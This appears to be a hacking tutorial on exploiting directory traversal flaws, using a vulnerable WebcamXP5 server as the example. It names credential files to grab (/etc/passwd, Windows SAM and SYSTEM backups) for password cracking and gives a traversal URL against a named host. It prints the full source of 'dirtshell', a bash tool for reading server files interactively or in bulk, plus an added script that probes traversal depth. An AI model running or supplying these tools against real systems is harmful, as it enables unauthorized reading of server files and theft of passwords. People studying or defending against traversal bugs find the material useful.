
Web applications that are vulnerable to directory traversal offer a small window into the contents of the target server. In a way, you've semi-penetrated the system, albeit with minimal privileges: mostly you can just read files, and only the ones the web server's own account is allowed to read. That's not necessarily a bad thing. Being able to read /etc/passwd, for instance, gives you the list of user accounts on the system, which helps with a brute force attack (the password hashes themselves live in /etc/shadow, which is normally readable only by root). On Windows, if you can read C:\Windows\repair\sam and C:\Windows\repair\system, you can download those files and start cracking Windows passwords. These are backup copies of the SAM and SYSTEM registry hives, so they may be out of date, but the live hives under C:\Windows\System32\config are locked while Windows is running, which makes the backups the ones worth grabbing.
Let's have a quick look at a web application that's vulnerable to a directory traversal attack. Here we've found a target that's running a vulnerable version of WebcamXP5. Requesting the URL below, with enough ..\ steps to walk from the application's document root back to the drive root, returns the contents of C:\boot.ini:

http://ifrit.techorganic.com:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini

Typing that out for every file we want gets tedious, so we'll use dirtshell, a small bash script that does the work for us. Let's have a look at it in action. Once the shell starts, we can just type in the path and file that we want to read. In this case, we've read the contents of C:\boot.ini and C:\Windows\system.ini. In a way, it looks like we've got a shell on the server itself. That's great, but typing each file and hitting Enter to view the result still takes a little time. dirtshell can also take a file with a list of files that we want to read. For example, let's create a file called check.txt with the following:
\\boot.ini
\\windows\\win.ini
\\windows\\system.ini
We can tell dirtshell to read that file and print the output of each file specified, if it exists. No interaction with the user is required; dirtshell reads them for us automatically. Here's the code for the program:
#!/bin/bash
# dirtshell: read files through a directory traversal bug, either one path at
# a time from an interactive prompt or in bulk from a list of paths.

function usage {
    echo "usage: $0 [-p prefix] [-s suffix] [-f input.txt] -u URL"
    echo "eg : $0 -p \"../../../../\" -s \"%00\" -u \"http://vulnsite.com/test.php?page=\""
}

if [[ -z $1 ]]; then
    usage
    exit 1
fi

prefix=""
suffix=""
url=""
cmdfile=""

while getopts "p:s:u:f:" OPT; do
    case $OPT in
        p) prefix=$OPTARG;;
        s) suffix=$OPTARG;;
        u) url=$OPTARG;;
        f) cmdfile=$OPTARG;;
        *) usage; exit 1;;
    esac
done

if [[ -z $url ]]; then
    usage
    exit 1
fi

if ! command -v curl &>/dev/null; then
    echo "[!] curl needs to be installed to run this script"
    exit 1
fi

# Request one path and print the response body. -s drops curl's progress
# meter so only the file contents (or the server's error page) reach stdout.
fetch() {
    echo "[+] requesting ${url}${prefix}${1}${suffix}"
    curl -s "${url}${prefix}${1}${suffix}"
    echo ""
}

if [[ -n $cmdfile ]]; then
    # batch mode: one path per line, no interaction needed
    if [[ ! -f $cmdfile ]]; then
        echo "[!] $cmdfile not found"
        exit 1
    fi
    # read -r keeps backslashes exactly as written, which matters for
    # Windows-style paths such as ..\..\boot.ini; reading line by line also
    # keeps paths with spaces intact, which $(cat file) would split apart
    while IFS= read -r line; do
        [[ -z $line ]] && continue
        fetch "$line"
    done < "$cmdfile"
else
    # interactive shell: read paths until EOF (Ctrl-D) or Ctrl-C
    while IFS= read -r -p "[>] " cmd; do
        fetch "$cmd"
    done
fi
dirtshell takes four options. -u specifies the URL you're targeting, everything up to the point where the path gets injected (such as http://vulnsite.com/test.php?page=), and it's mandatory. -p specifies the prefix prepended to each path, such as "../../../" or "..\..\..", and -f, as we've already seen, points at a file with one path per line. -s specifies a suffix appended to each path, for instance a URL-encoded null byte ("%00") when dealing with PHP scripts that tack their own extension onto the path you supply; bear in mind that PHP 5.3.4 and later reject paths containing a null byte, so that trick only works against older versions.
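The manual request above used eleven ..\ steps, and dirtshell leaves the prefix for you to guess. The following is an added example (editor's code, not part of dirtshell, WebcamXP5 or the original post) of one way to find the right depth: build the URL for depths 1..N using the same prefix/suffix scheme dirtshell uses, fetch each one, and count a response as a hit only if it contains a marker that the real file must contain (for boot.ini, "[boot loader]"; for /etc/passwd, "root:x:"), so that a 200 response carrying the application's default or "not found" page is not mistaken for a successful read. The fetch command is taken from a FETCH variable so the logic can be exercised without a live target; the host names and response bodies used here are constructed, and the traversal step can be any encoding variant (e.g. '%2e%2e/') since it is passed through untouched.

```shell
#!/bin/sh
# Added example, not part of dirtshell: probe traversal depth and verify hits.

# Repeat traversal step $2 (e.g. '../', '..\' or '%2e%2e/') $1 times.
traversal_prefix() {
    _depth=$1 _step=$2 _out="" _i=0
    while [ "$_i" -lt "$_depth" ]; do
        _out="${_out}${_step}"
        _i=$((_i + 1))
    done
    printf '%s' "$_out"
}

# base URL ($1) + step ($2) repeated depth ($3) times + file ($4) + suffix ($5)
traversal_url() {
    printf '%s%s%s%s' "$1" "$(traversal_prefix "$3" "$2")" "$4" "${5:-}"
}

# A 200 response is not proof of a read: the app may answer with its default
# page or an error page. Only count it if the body ($1) contains a marker ($2)
# that the real file must contain, e.g. '[boot loader]' for boot.ini.
is_hit() {
    case "$1" in
        *"$2"*) return 0 ;;
    esac
    return 1
}

# Try depths 1..$5 (default 12) and print the first depth whose response
# contains the marker. FETCH names the command that prints a body for a URL;
# it defaults to curl and can be replaced by a shell function for offline use.
find_depth() {
    _base=$1 _step=$2 _file=$3 _marker=$4 _max=${5:-12} _suffix=${6:-}
    _fetch=${FETCH:-"curl -s --max-time 10"}
    _d=1
    while [ "$_d" -le "$_max" ]; do
        _url=$(traversal_url "$_base" "$_step" "$_d" "$_file" "$_suffix")
        _body=$($_fetch "$_url" 2>/dev/null) || _body=""
        if is_hit "$_body" "$_marker"; then
            printf '%s\n' "$_d"
            return 0
        fi
        _d=$((_d + 1))
    done
    return 1
}

# Usage against a live target (assumed host, not from the original page):
#   find_depth 'http://target.test:8080/' '..\' 'boot.ini' '[boot loader]' 12
```

Once find_depth prints a depth, the matching prefix for dirtshell is simply the step repeated that many times, and any larger depth will usually work as well, since extra ..\ steps past the drive root are collapsed by the filesystem.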